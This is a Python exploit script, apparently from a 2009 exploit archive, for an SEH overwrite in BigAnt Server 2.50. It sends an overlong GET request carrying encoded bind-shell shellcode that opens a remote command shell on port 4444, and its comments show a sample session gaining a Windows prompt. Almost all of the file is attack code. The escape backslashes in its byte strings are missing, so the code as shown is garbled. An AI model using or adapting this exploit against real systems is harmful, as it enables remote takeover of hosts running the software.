#!/usr/bin/python
# BigAnt Server version 2.50 SEH Overwrite - 0day
# Written and discovered by Blake
# Tested on Windows XP SP3
# 
# $ ./bigant.py 192.168.1.131 6660
#
# [*] BigAnt Server v2.50 SEH Overwrite 0day
# [*] Written and discovered by Blake
# [*] Tested on Windows XP SP3
#
# [+] Connecting to 192.168.1.131 on port 6660
# [+] Sending payload
# [+] Connect to bind shell on port 4444
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:WINDOWSsystem32>

import socket, sys

if len(sys.argv)!= 3:
	print "n[*] Usage: %s <ip> <port>n" % sys.argv[0]
	sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2]) 	# port 6660 by default

# windows/shell_bind_tcp - 696 bytes  Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
shellcode = (
"x89xe2xdbxccxd9x72xf4x5fx57x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x4bx4cx42x4ax4ax4bx50x4dx4bx58x4bx49x4bx4fx4b"
"x4fx4bx4fx43x50x4cx4bx42x4cx51x34x46x44x4cx4b"
"x50x45x47x4cx4cx4bx43x4cx43x35x44x38x43x31x4a"
"x4fx4cx4bx50x4fx42x38x4cx4bx51x4fx51x30x45x51"
"x4ax4bx50x49x4cx4bx47x44x4cx4bx45x51x4ax4ex50"
"x31x49x50x4ax39x4ex4cx4bx34x49x50x44x34x43x37"
"x49x51x49x5ax44x4dx45x51x48x42x4ax4bx4cx34x47"
"x4bx50x54x46x44x46x48x44x35x4bx55x4cx4bx51x4f"
"x46x44x43x31x4ax4bx43x56x4cx4bx44x4cx50x4bx4c"
"x4bx51x4fx45x4cx43x31x4ax4bx44x43x46x4cx4cx4b"
"x4dx59x42x4cx47x54x45x4cx43x51x49x53x50x31x49"
"x4bx43x54x4cx4bx47x33x46x50x4cx4bx47x30x44x4c"
"x4cx4bx42x50x45x4cx4ex4dx4cx4bx47x30x43x38x51"
"x4ex45x38x4cx4ex50x4ex44x4ex4ax4cx46x30x4bx4f"
"x4ex36x45x36x46x33x43x56x45x38x47x43x46x52x42"
"x48x43x47x42x53x46x52x51x4fx50x54x4bx4fx48x50"
"x42x48x48x4bx4ax4dx4bx4cx47x4bx46x30x4bx4fx48"
"x56x51x4fx4dx59x4bx55x45x36x4bx31x4ax4dx43x38"
"x45x52x46x35x43x5ax45x52x4bx4fx48x50x45x38x49"
"x49x44x49x4ax55x4ex4dx51x47x4bx4fx48x56x51x43"
"x51x43x51x43x51x43x46x33x51x53x50x53x47x33x51"
"x43x4bx4fx4ex30x42x46x43x58x42x31x51x4cx45x36"
"x46x33x4bx39x4dx31x4cx55x45x38x4ex44x44x5ax42"
"x50x49x57x50x57x4bx4fx49x46x42x4ax44x50x50x51"
"x50x55x4bx4fx48x50x45x38x49x34x4ex4dx46x4ex4a"
"x49x46x37x4bx4fx4ex36x50x53x46x35x4bx4fx48x50"
"x43x58x4bx55x47x39x4cx46x50x49x46x37x4bx4fx48"
"x56x46x30x50x54x50x54x46x35x4bx4fx4ex30x4cx53"
"x42x48x4bx57x44x39x48x46x44x39x50x57x4bx4fx48"
"x56x51x45x4bx4fx4ex30x42x46x43x5ax42x44x42x46"
"x43x58x43x53x42x4dx4cx49x4bx55x43x5ax46x30x51"
"x49x51x39x48x4cx4dx59x4dx37x42x4ax51x54x4bx39"
"x4ax42x50x31x49x50x4ax53x4ex4ax4bx4ex50x42x46"
"x4dx4bx4ex50x42x46x4cx4ax33x4cx4dx43x4ax47x48"
"x4ex4bx4ex4bx4ex4bx45x38x42x52x4bx4ex4ex53x42"
"x36x4bx4fx42x55x47x34x4bx4fx49x46x51x4bx50x57"
"x51x42x50x51x46x31x50x51x43x5ax43x31x50x51x50"
"x51x51x45x50x51x4bx4fx48x50x42x48x4ex4dx48x59"
"x45x55x48x4ex50x53x4bx4fx49x46x42x4ax4bx4fx4b"
"x4fx47x47x4bx4fx4ex30x4cx4bx51x47x4bx4cx4bx33"
"x48x44x45x34x4bx4fx49x46x50x52x4bx4fx4ex30x45"
"x38x4ax50x4dx5ax43x34x51x4fx51x43x4bx4fx4ex36"
"x4bx4fx4ex30x41x41")


payload = "x41" * 985		# seh overwritten at 989
next_seh = "xebx06x90x90"   # short jump 6 bytes
seh = "x6ax19x9ax0f"	# p/p/r from vbajet32.dll
nops = "x90" * 10		# nop sled
sc = shellcode			# 710 bytes available for shellcode

print "n[*] BigAnt Server v2.50 SEH Overwrite 0day"
print "[*] Written and discovered by Blake"
print "[*] Tested on Windows XP SP3n"

print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
	s.connect((host,port))
except:
	print "[x] Error establishing connectionn"
	sys.exit(0)

print "[+] Sending payload"
s.send("GET " + payload + next_seh + seh + nops + sc + "rnrn")
s.close()
print "[+] Connect to bind shell on port 4444n"

# www.Syue.com [2009-09-15]